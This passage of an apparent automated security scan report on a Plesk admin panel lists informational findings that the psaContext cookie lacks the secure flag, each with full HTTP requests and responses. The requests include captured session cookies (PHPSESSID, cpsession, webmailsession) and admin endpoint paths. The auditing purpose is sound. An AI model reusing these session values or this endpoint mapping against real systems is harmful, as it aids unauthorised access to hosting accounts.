Path:
/admin/subscription/list/reset-search/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=subscriptions; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/subscription/list/reset-search/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:16:00 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:16:01 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=subscriptions; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:16:01 GMT Server: sw-cp-server Content-Length: 19812
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
4.31. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/left.php3
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=dashboard; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /left.php3 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: psaContext=dashboard; PHPSESSID=b6e4a9281ca7faad89475e4d77b34296; locale=en-US
Response
HTTP/1.1 200 OK Last-Modified: Fri, 23 Sep 2011 18:34:33 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=dashboard; path=/ Date: Fri, 23 Sep 2011 18:34:33 GMT Server: sw-cp-server Content-Length: 18650
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.32. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/license.php3
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=dashboard; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /license.php3 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 200 OK Last-Modified: Fri, 23 Sep 2011 18:32:37 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=dashboard; path=/ Date: Fri, 23 Sep 2011 18:32:37 GMT Server: sw-cp-server Content-Length: 23854
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.33. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/login_up.php3
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login_up.php3 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BarExpanded=True; PHPSESSID=e4155988e1f250b6a55cb24dea872fd0; locale=en-US; psaContext=customers
Response
HTTP/1.1 200 OK Last-Modified: Fri, 23 Sep 2011 19:19:18 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-Plesk: PSA-Key/PLSK016479390000 Set-Cookie: psaContext=customers; path=/ Date: Fri, 23 Sep 2011 19:19:18 GMT Server: sw-cp-server Content-Length: 5389
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.34. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-info/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/admin-info/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=personal-info; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/admin-info/?context=personal-info HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Fri, 23 Sep 2011 19:12:11 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=personal-info; path=/ Date: Fri, 23 Sep 2011 19:12:11 GMT Server: sw-cp-server Content-Length: 20512
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.35. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-password/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/admin-password/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=credentials-info; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/admin-password/?context=credentials-info HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BarExpanded=True; PHPSESSID=1e33734a9713ad69de63c483f7f5d471; locale=en-US; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Fri, 23 Sep 2011 19:42:30 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=credentials-info; path=/ Date: Fri, 23 Sep 2011 19:42:30 GMT Server: sw-cp-server Content-Length: 9194
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.36. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/domain-summary-report/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/client@3/domain-summary-report/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/client@3/domain-summary-report/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:53:20 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=reseller-tools; path=/ Date: Sat, 24 Sep 2011 15:53:20 GMT Server: sw-cp-server Content-Length: 9186
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.37. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/domain@any/traffic/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/client@3/domain@any/traffic/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/client@3/domain@any/traffic/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:27:19 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:27:19 GMT Server: sw-cp-server Content-Length: 9102
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.38. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/ipaddress@/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/client@3/ipaddress@/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/client@3/ipaddress@/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:27:12 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=reseller-tools; path=/ Date: Sat, 24 Sep 2011 15:27:12 GMT Server: sw-cp-server Content-Length: 9058
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.39. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/skeleton/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/client@3/skeleton/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/client@3/skeleton/?cmd=chdir&file=%2F HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@3/skeleton/ Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:30:52 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:30:52 GMT Server: sw-cp-server Content-Length: 22069
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.40. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@4/domain@any/traffic/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/client@4/domain@any/traffic/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/client@4/domain@any/traffic/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/client@any/traffic/ Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:54:19 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=reseller-tools; path=/ Date: Sat, 24 Sep 2011 15:54:19 GMT Server: sw-cp-server Content-Length: 9272
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.41. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/client@5/domain@any/traffic/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/client@5/domain@any/traffic/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/client@5/domain@any/traffic/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/client@any/traffic/ Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Last-Modified: Sat, 24 Sep 2011 15:27:13 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=reseller-tools; path=/ Date: Sat, 24 Sep 2011 15:27:13 GMT Server: sw-cp-server Content-Length: 9412
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.42. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/ftp-repository/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/backup/ftp-repository/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=service-plans; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/ftp-repository/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Last-Modified: Sat, 24 Sep 2011 16:05:25 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=service-plans; path=/ Date: Sat, 24 Sep 2011 16:05:25 GMT Server: sw-cp-server Content-Length: 13490
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The following cookie was issued by the application and does not have the secure flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/ftp-repository/properties/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/ Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:31:13 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:31:13 GMT Server: sw-cp-server Content-Length: 8796
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.44. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/backup/local-repository/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/local-repository/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/create/ Cookie: backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
